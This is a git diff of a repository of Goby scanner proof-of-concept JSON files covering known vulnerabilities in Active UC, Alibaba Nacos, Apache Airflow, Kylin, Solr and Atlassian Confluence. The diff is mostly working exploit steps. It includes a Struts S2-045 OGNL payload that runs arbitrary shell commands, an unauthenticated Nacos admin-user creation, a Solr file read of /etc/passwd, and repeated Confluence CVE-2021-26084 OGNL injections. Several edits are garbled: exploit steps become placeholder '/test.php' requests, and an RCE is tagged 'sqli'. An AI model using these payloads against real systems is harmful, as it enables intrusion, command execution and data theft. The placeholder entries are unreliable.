"Name": "Active UC index.action RCE", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "title=\"网动统一通信平台(Active UC)\"", - "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令", - "Product": "网动统一通信平台(Active UC)", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Description": "", + "Product": "Active UC", + "Homepage": "http://www.iactive.com.cn/", + "Author": "", + "Impact": "Active UC index.action has a RCE vulnerability.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "cmd", + "Type": "input", + "Value": "whoami" + } ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -41,7 +42,7 @@ "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -59,7 +60,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -72,12 +73,12 @@ "Connection": "close", "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", "Charsert": "UTF-8", - "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", + "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", "Cache-Control": "no-cache", "Pragma": "no-cache" }, "data_type": "text", - "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -93,10 +94,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-28 10:08:54", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Alibaba_Nacos_Add_user_not_authorized.json b/json/Alibaba_Nacos_Add_user_not_authorized.json index e9a08ef..c5933e8 100644 --- a/json/Alibaba_Nacos_Add_user_not_authorized.json +++ b/json/Alibaba_Nacos_Add_user_not_authorized.json @@ -2,39 +2,38 @@ "Name": "Alibaba Nacos Add user not authorized", "Level": "2", "Tags": [ - "Ultra vires" + "unauthorized" ], - "GobyQuery": "title==\"Nacos\"", - "Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", + "GobyQuery": "title=\"Nacos\"", + "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "PeiQi", - "Impact": "

Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.

", - "Recommandation": "

Upgrade version

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", + "Recommendation": "update", + "References": [], "HasExp": true, - "ExpParams": [ - { - "name": "User", - "type": "input", - "value": "PeiQi", - "show": "" - }, - { - "name": "Pass", - "type": "input", - "value": "PeiQi", - "show": "" - }, - { - "name": "Dir", - "type": "select", - "value": "/v1/auth/users,/nacos/v1/auth/users", - "show": "" - } - ], + "ExpParams": [ + { + "Name": "User", + "Type": "input", + "Value": "test" + }, + { + "Name": "Pass", + "Type": "input", + "Value": "test" + }, + { + "Name": "Dir", + "Type": "select", + "Value": "/v1/auth/users,/nacos/v1/auth/users" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "OR", { @@ -90,7 +89,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -103,7 +102,7 @@ "data_type": "text", "data": "username={{{User}}}&password={{{Pass}}}" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -117,10 +116,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-04-04 19:56:49", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Alibaba_Nacos_Default_password.json b/json/Alibaba_Nacos_Default_password.json index 9f09c58..dda72a9 100644 --- a/json/Alibaba_Nacos_Default_password.json +++ b/json/Alibaba_Nacos_Default_password.json @@ -1,19 +1,23 @@ { - "Name": "Alibaba Nacos Default password", + "Name": "Alibaba Nacos Default Password", "Level": "1", "Tags": [ - "Default password" + "Default Password" ], - "GobyQuery": "title==\"Nacos\"", - "Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)", + "GobyQuery": "title=\"Nacos\"", + "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "PeiQi", - "Impact": "

Log in to the background to view sensitive information

", - "Recommandation": "

Upgrade version

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "OR", { @@ -71,6 +75,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-04 18:56:41", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Airflow_Unauthorized.json b/json/Apache_Airflow_Unauthorized.json index 1cc21ae..23d8bc4 100644 --- a/json/Apache_Airflow_Unauthorized.json +++ b/json/Apache_Airflow_Unauthorized.json @@ -1,18 +1,18 @@ { "Name": "Apache Airflow Unauthorized", - "Level": "3", + "Level": "2", "Tags": [ "Unauthorized" ], "GobyQuery": "app=\"APACHE-Airflow\"", - "Description": "remote attacker to gain unauthorized access to a targeted system", + "Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.", "Product": "APACHE-Airflow", "Homepage": "https://airflow.apache.org/", - "Author": "aetkrad", - "Impact": "

This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs

", - "Recommendation": "", + "Author": "", + "Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.", + "Recommendation": "Restrict public access and upgrade to the latest version of Airflow.", "References": [], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -62,6 +62,43 @@ ] } ], - "PostTime": "2021-10-31 15:32:53", - "GobyVersion": "1.8.302" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Kylin_Console_Default_password.json b/json/Apache_Kylin_Console_Default_password.json index 42863fd..0dec676 100644 --- a/json/Apache_Kylin_Console_Default_password.json +++ b/json/Apache_Kylin_Console_Default_password.json @@ -1,19 +1,23 @@ { - "Name": "Apache Kylin Console Default password", + "Name": "Apache Kylin Console default password", "Level": "1", "Tags": [ "Default password" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console", + "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", "Product": "Apache Kylin", "Homepage": "http://kylin.apache.org/", - "Author": "PeiQi", - "Impact": "

The attacker will log into the background as an administrator to further attack

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -51,6 +55,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-04 15:51:21", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Kylin_Unauthorized_configuration_disclosure.json b/json/Apache_Kylin_Unauthorized_configuration_disclosure.json index 17526a7..452be2f 100644 --- a/json/Apache_Kylin_Unauthorized_configuration_disclosure.json +++ b/json/Apache_Kylin_Unauthorized_configuration_disclosure.json @@ -1,28 +1,31 @@ { - "Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)", - "Level": "0", + "Name": "Apache Kylin API Unauthorized Access CVE-2020-13937", + "Level": "1", "Tags": [ - "Disclosure of Sensitive Information" + "unauthorized" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.", + "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", "Product": "Apache kylin", "Homepage": "http://kylin.apache.org/", - "Author": "PeiQi", - "Impact": "

Attackers can use this vulnerability to obtain sensitive information of the system.

", - "Recommandation": "

Upgrade to the safe version, or perform the following mitigation measures:

Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \";

Delete the following line \"< scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/>\";

Restart the kylin instance to take effect.

", + "Author": "", + "Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.", + "Recommendation": "update", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2020-13937" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Config", - "type": "select", - "value": "/kylin/api/admin/config", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Config", + "Type": "select", + "Value": "/kylin/api/admin/config" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,7 +33,7 @@ "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -57,18 +60,18 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -89,10 +92,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-04-04 15:55:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Apache_Solr_Arbitrary_File_Read.json b/json/Apache_Solr_Arbitrary_File_Read.json index e31407f..50f128e 100644 --- a/json/Apache_Solr_Arbitrary_File_Read.json +++ b/json/Apache_Solr_Arbitrary_File_Read.json @@ -1,155 +1,155 @@ -{ - "Name": "Apache Solr Arbitrary File Read", - "Level": "2", - "Tags": ["fileread"], - "GobyQuery": "app=\"Solr\"", - "Description": "Apache Solr has an arbitrary file read vulnerability, which allows attackers to obtain sensitive files from the target server without authorization.", - "Product": "Apache Solr", - "Homepage": "https://solr.apache.org/", - "Author": "PeiQi", - "Impact": "

Read any file on the server

", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "file", - "type": "createSelect", - "value": "/etc/passwd,\\\\127.0.0.1\\c$\\Windows\\win.ini", - "show": "" - } - ], - "ExpTips": { - "Type": "", - "Content": "" - }, - "ScanSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/solr/admin/cores?indexInfo=false&wt=json", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "responseHeader", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/solr/admin/cores?indexInfo=false&wt=json", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "responseHeader", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|(?s)\"name\":\"(.*?)\"," - ] - }, - { - "Request": { - "method": "POST", - "set_variable":["solrCore|lastbody|regex|(?s)\"name\":\"(.*?)\","], - "uri": "/solr/{{{solrCore}}}/config", - "follow_redirect": false, - "header": { - "Content-Type": "application/json" - }, - "data_type": "text", - "data": "{\"set-property\" : {\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [] - }, - { - "Request": { - "method": "POST", - "uri": "/solr/{{{solrCore}}}/debug/dump?param=ContentStreams", - "follow_redirect": false, - "header": { - "Content-Type": "application/x-www-form-urlencoded" - }, - "data_type": "text", - "data": "stream.url=file://{{{file}}}" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|(?s)\"stream\":\"(.*)\"}]" - ] - } - ], - "PostTime": "2021-03-27 17:17:15", - "GobyVersion": "1.8.254" +{ + "Name": "Apache Solr Arbitrary File Read", + "Level": "2", + "Tags": ["fileread"], + "GobyQuery": "app=\"Solr\"", + "Description": "Apache Solr has an arbitrary file read vulnerability, which allows attackers to obtain sensitive files from the target server without authorization.", + "Product": "Apache Solr", + "Homepage": "https://solr.apache.org/", + "Author": "PeiQi", + "Impact": "

Read any file on the server

", + "Recommandation": "

undefined

", + "References": [ + "http://wiki.peiqi.tech" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "file", + "type": "createSelect", + "value": "/etc/passwd,\\\\127.0.0.1\\c$\\Windows\\win.ini", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", + "follow_redirect": false, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|(?s)\"name\":\"(.*?)\"," + ] + }, + { + "Request": { + "method": "POST", + "set_variable":["solrCore|lastbody|regex|(?s)\"name\":\"(.*?)\","], + "uri": "/solr/{{{solrCore}}}/config", + "follow_redirect": false, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"set-property\" : {\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/solr/{{{solrCore}}}/debug/dump?param=ContentStreams", + "follow_redirect": false, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "stream.url=file://{{{file}}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|(?s)\"stream\":\"(.*)\"}]" + ] + } + ], + "PostTime": "2021-03-27 17:17:15", + "GobyVersion": "1.8.254" } \ No newline at end of file diff --git a/json/Aspcms_Backend_Leak.json b/json/Aspcms_Backend_Leak.json index 33d3b2c..9a05735 100644 --- a/json/Aspcms_Backend_Leak.json +++ b/json/Aspcms_Backend_Leak.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "app=\"ASPCMS\"", - "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", + "Description": "aspCMS is a module based ASP Content Management System (CMS).", "Product": "ASPCMS", - "Homepage": "https://gobies.org/", - "Author": "aetkrad", - "Impact": "

leak backend url

", + "Homepage": "", + "Author": "", + "Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.", "Recommendation": "", "References": [], "HasExp": true, @@ -126,6 +126,6 @@ ] } ], - "PostTime": "2021-11-02 20:50:45", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json b/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json index 91bc4a9..0976c3a 100644 --- a/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json +++ b/json/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json @@ -1,25 +1,32 @@ { - "Name": "Atlassian Confluence OGNL injection CVE-2021-26084", + "Name": "Atlassian Confluence OGNL Injection CVE-2021-26084", "Level": "3", "Tags": [ - "rce" + "sqli" ], - "GobyQuery": "app=\"Confluence\"", - "Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.", + "GobyQuery": "app=\"Confluence\" || product=\"Confluence\" || company=\"Atlassian\"", + "Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.", "Product": "Atlassian Confluence", "Homepage": "https://www.atlassian.com", - "Author": "luckying1314@139.com", - "Impact": "

An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

", - "Recommendation": "

General repair suggestions:

Check and upgrade to the secure version based on the information in the affected version. The official download link is :https://www.atlassian.com/software/confluence/download-archives

Temporary repair suggestions:

If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

", + "Author": "", + "Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", + "Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "References": [ - "https://github.com/alt3kx/CVE-2021-26084_PoC" + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://jira.atlassian.com/browse/CONFSERVER-67940", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html" ], "HasExp": true, "ExpParams": [ { - "Name": "command", + "Name": "Command", "Type": "input", "Value": "whoami" + }, + { + "Name": "Path", + "Type": "select", + "Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features" } ], "ExpTips": { @@ -27,7 +34,7 @@ "Content": "" }, "ScanSteps": [ - "AND", + "OR", { "Request": { "method": "POST", @@ -37,12 +44,8 @@ "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", - "data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027", - "set_variable": [ - "r1|rand|int|8", - "r2|rand|int|7", - "r4|r1|add|r2" - ] + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -59,14 +62,420 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "{{{r4}}}", + "value": "value=\"aaaa{140592=null}", "bz": "" } ] }, - "SetVariable": [ - "output|lastbody|regex|" - ] + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/doenterpagevariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage.action?spaceKey=myproj", + "follow_redirect": true, 